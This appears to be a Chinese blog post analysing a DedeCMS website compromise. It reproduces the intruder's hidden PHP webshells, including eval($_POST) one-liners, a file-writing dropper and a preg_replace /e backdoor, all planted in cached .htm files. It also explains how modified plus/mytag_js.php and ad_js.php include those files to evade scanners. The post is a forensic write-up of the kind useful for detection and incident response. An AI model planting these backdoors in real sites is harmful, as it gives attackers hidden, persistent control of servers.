一种奇特的DEDE隐藏后门办法（dedecms漏洞90sec.php文件）

向右看齐 2022-09-17 12:18 125阅读 0赞

单位某站用的dedecms,今天被某黑阔getshell了，提交到了wooyun.

为了还原黑阔入侵的手法，用鬼哥的getshell测试居然没成功, 是不是getshell过一次，再次就不会成功呢？

无奈只能打包代码，用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件，文件代码如下：

<table> 
 <tbody> 
  <tr> 
   <td><code>1</code></td> 
   <td><code>{dede:php}</code><code>file_put_contents</code><code>(’90sec.php’,'’);{/dede:php}</code></td> 
  </tr> 
 </tbody> 
</table>

但是翻遍所有的Web目录也没有找到90sec.php文件，有朋友指点说可能是其它文件include这个文件。然后又用Seay的代码审计工具定义关键字各种扫，还是没找到。

最后老大翻到data/cache目录下发现了几个htm文件，myad-1.htm,myad-16.htm,mytag-1208.htm等，打开这些html文件，代码分别如下：

<table> 
 <tbody> 
  <tr> 
   <td><code>&lt;!–</code> 
    <div> 
     <table> 
      <tbody> 
       <tr> 
        <td><code>2</code></td> 
        <td>&nbsp;</td> 
       </tr> 
      </tbody> 
     </table> 
    </div> 
    <div> 
     <table> 
      <tbody> 
       <tr> 
        <td><code>3</code></td> 
        <td><code>document.write(“dedecmsisok<strong>&lt;</strong>?php@</code><code>eval</code><code>(</code><code>$_POST</code><code>[cmd]);?&gt;”);</code></td> 
       </tr> 
      </tbody> 
     </table> 
    </div> 
    <table> 
     <tbody> 
      <tr> 
       <td><code>4</code></td> 
       <td><code>–&gt;</code></td> 
      </tr> 
     </tbody> 
    </table> </td> 
   <td>&nbsp;</td> 
  </tr> 
 </tbody> 
</table>

`<!–`

<table> 
 <tbody> 
  <tr> 
   <td>&nbsp;</td> 
   <td><code>document.write(“axxxxx’);</code><code>echo</code><code>‘OK’;@fclose(</code><code>$fp</code><code>);?&gt;”);</code></td> 
  </tr> 
 </tbody> 
</table>

`<!–`

<table> 
 <tbody> 
  <tr> 
   <td><code>3</code></td> 
   <td><code>document.write(“<strong>&lt;</strong>?php</code><code>$fp</code> <code>=@</code><code>fopen</code><code>(‘av.php’, ‘a’);@fwrite(</code><code>$fp</code><code>,‘<strong>&lt;</strong>?php</code> <code>eval</code><code>(</code><code>$_POST</code><code>[110])?&gt;axxxxx’);</code><code>echo</code> <code>‘OK’;@fclose(</code><code>$fp</code><code>);?&gt;”);</code></td> 
  </tr> 
 </tbody> 
</table>

<table> 
 <tbody> 
  <tr> 
   <td>&nbsp;</td> 
   <td><code>&lt;!–</code> 
    <div> 
     <table> 
      <tbody> 
       <tr> 
        <td><code>2</code></td> 
        <td><code>document.write(“<strong>&lt;</strong>?php</code><code>echo</code> <code>‘dedecms 5.70day&lt;br&gt;guige,90sec.org’;@preg_replace(‘/[copyright]/e’,</code><code>$_REQUEST</code><code>[</code><code>'guige'</code><code>],’error’);?&gt;”);</code></td> 
       </tr> 
      </tbody> 
     </table> 
    </div> 
    <table> 
     <tbody> 
      <tr> 
       <td><code>3</code></td> 
       <td><code>–&gt;</code></td> 
      </tr> 
     </tbody> 
    </table> </td> 
  </tr> 
 </tbody> 
</table>

看到这几个文件很奇怪，不知道黑阔要干嘛？？虽然代码看似很熟悉，但是HTML文件能当后门用么？想起之前朋友说的include,然后结合前段时间的getshell漏洞利用细节，最终翻到plus/mytag\_js.php文件，在这个文件里终于发现黑阔无节操的地方，主要代码如下：

[![dedecms奇特webshell后门][dedecms_webshell]][dedecms_webshell]

看到上面的代码我们应该知道黑阔是多么的邪恶，在生成的htm格式的cache文件中写入各种类型的一句话代码，然后再修改plus/ad\_js.php和mytag\_js.php文件，包含htm格式的cache文件。这样黑阔只需要在菜刀中填入以下URL就可以连接一句话了.

http://www.ji-nuo.com /plus/mytag\_js.php?id=1208

http://www.ji-nuo.com /plus/ad\_js.php?id=1

具体的id以及文件名跟data/cache目录下的myad-1.htm，mytag-1208.htm是有关系的。因此各种webshell扫描器都没有扫到webshell后门文件，因为很多默认都不对htm进行扫描.

不怎么懂php，所以分析可能有差错的地方，欢迎指正！更多请关注：[**济宁网站建设**][Link 1]

[dedecms_webshell]: http://www.91ri.org/wp-content/uploads/auto_save_image/2013/06/072220b8E.jpg
[Link 1]: http://www.ji-nuo.com/